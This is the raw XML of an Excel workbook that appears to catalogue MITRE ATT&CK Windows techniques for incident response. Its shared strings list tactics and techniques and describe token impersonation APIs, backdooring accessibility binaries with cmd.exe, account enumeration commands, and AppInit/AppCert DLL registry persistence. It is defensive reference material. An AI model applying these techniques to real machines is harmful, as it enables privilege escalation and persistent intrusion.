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RTHIR-Public\ATT&amp;CK\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="21576" windowHeight="8112" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Matrix" sheetId="1" r:id="rId1"/>
    <sheet name="Details" sheetId="8" r:id="rId2"/>
    <sheet name="Graphs" sheetId="10" r:id="rId3"/>
    <sheet name="Stats" sheetId="5" r:id="rId4"/>
    <sheet name="Notes" sheetId="9" r:id="rId5"/>
    <sheet name="Sample 2" sheetId="7" r:id="rId6"/>
    <sheet name="Sample" sheetId="6" r:id="rId7"/>
    <sheet name="Detailed Matrix" sheetId="3" r:id="rId8"/>
    <sheet name="Quick Wins" sheetId="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0" l="1"/>
  <c r="B4" i="10" s="1"/>
  <c r="C5" i="10"/>
  <c r="B5" i="10" s="1"/>
  <c r="C7" i="10"/>
  <c r="B7" i="10" s="1"/>
  <c r="C6" i="10"/>
  <c r="B6" i="10" s="1"/>
  <c r="C8" i="10"/>
  <c r="B8" i="10" s="1"/>
  <c r="S4" i="10"/>
  <c r="R4" i="10"/>
  <c r="Q4" i="10"/>
  <c r="M9" i="1"/>
  <c r="N9" i="1"/>
  <c r="O9" i="1"/>
  <c r="P9" i="1"/>
  <c r="Q9" i="1"/>
  <c r="M6" i="1"/>
  <c r="N6" i="1"/>
  <c r="O6" i="1"/>
  <c r="P6" i="1"/>
  <c r="Q6" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2717" uniqueCount="1622">
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Privilege Escualtion</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>Control Panel Items</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Execution through API</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Third-party Software</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>File System Permissions Weakness</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Registry Run Keys / Start Folder</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>File System Logical Offsets</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>Application Deployment Software</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Remote File Copy</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Connection Proxy</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>Remote Access Tools</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>CMSTP.exe</t>
  </si>
  <si>
    <t>Website</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Windows_Techniques</t>
  </si>
  <si>
    <t>Mitre ATT@CK Matrix - Windows</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Tactics</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Technical Description</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>T1134</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</si>
  <si>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1</t>
  </si>
  <si>
    <t>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system.2</t>
  </si>
  <si>
    <t>Access tokens can be leveraged by adversaries through three methods:3</t>
  </si>
  <si>
    <r>
      <t>Token Impersonation/Theft</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - An adversary creates a new access token that duplicates an existing token using </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>DuplicateToken(Ex)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The token can then be used with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ImpersonateLoggedOnUser</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to allow the calling thread to impersonate a logged on user's security context, or with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>SetThreadToken</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Create Process with a Token</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - An adversary creates a new access token with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>DuplicateToken(Ex)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and uses it with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>CreateProcessWithTokenW</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Make and Impersonate Token</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>LogonUser</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>function. The function will return a copy of the new session's access token and the adversary can use </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>SetThreadToken</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to assign the token to a thread.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Any standard user can use the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>runas</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
  </si>
  <si>
    <t>Windows Techniques</t>
  </si>
  <si>
    <t>T1015</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</si>
  <si>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t>
  </si>
  <si>
    <t>Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.6</t>
  </si>
  <si>
    <t>Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP).7 The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:</t>
  </si>
  <si>
    <r>
      <t>For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\utilman.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote Desktop Protocol</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> will cause the replaced file to be executed with SYSTEM privileges.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
  </si>
  <si>
    <t>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privileges.8</t>
  </si>
  <si>
    <t>Other accessibility features exist that may also be leveraged in a similar fashion:7</t>
  </si>
  <si>
    <r>
      <t>On-Screen Keyboard: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\osk.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t>Magnifier: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\Magnify.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t>Narrator: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\Narrator.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t>Display Switcher: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\DisplaySwitch.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t>App Switcher: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\AtBroker.exe</t>
    </r>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts.</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <r>
      <t>Example commands that can acquire this information are </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net user</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net group &lt;groupname&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net localgroup &lt;groupname&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> using the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> utility or through use of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>dsquery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>System Owner/User Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> may apply.</t>
    </r>
  </si>
  <si>
    <t>Mac</t>
  </si>
  <si>
    <r>
      <t>On Mac, groups can be enumerated through the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>id</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> commands. In mac specifically, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscl . list /Groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscacheutil -q group</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can also be used to enumerate groups and users.</t>
    </r>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <r>
      <t>On Linux, local users can be enumerated through the use of the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>/etc/passwd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> file which is world readable. In mac, this same file is only used in single-user mode in addition to the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>/etc/master.passwd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> file.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Also, groups can be enumerated through the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>id</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> commands. In mac specifically, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscl . list /Groups</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dscacheutil -q group</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can also be used to enumerate groups and users.</t>
    </r>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>T1098</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:9</t>
  </si>
  <si>
    <t>CreateProcess</t>
  </si>
  <si>
    <t>CreateProcessAsUser</t>
  </si>
  <si>
    <t>CreateProcessWithLoginW</t>
  </si>
  <si>
    <t>CreateProcessWithTokenW</t>
  </si>
  <si>
    <t>WinExec</t>
  </si>
  <si>
    <t>Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <r>
      <t>Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
    </r>
    <r>
      <rPr>
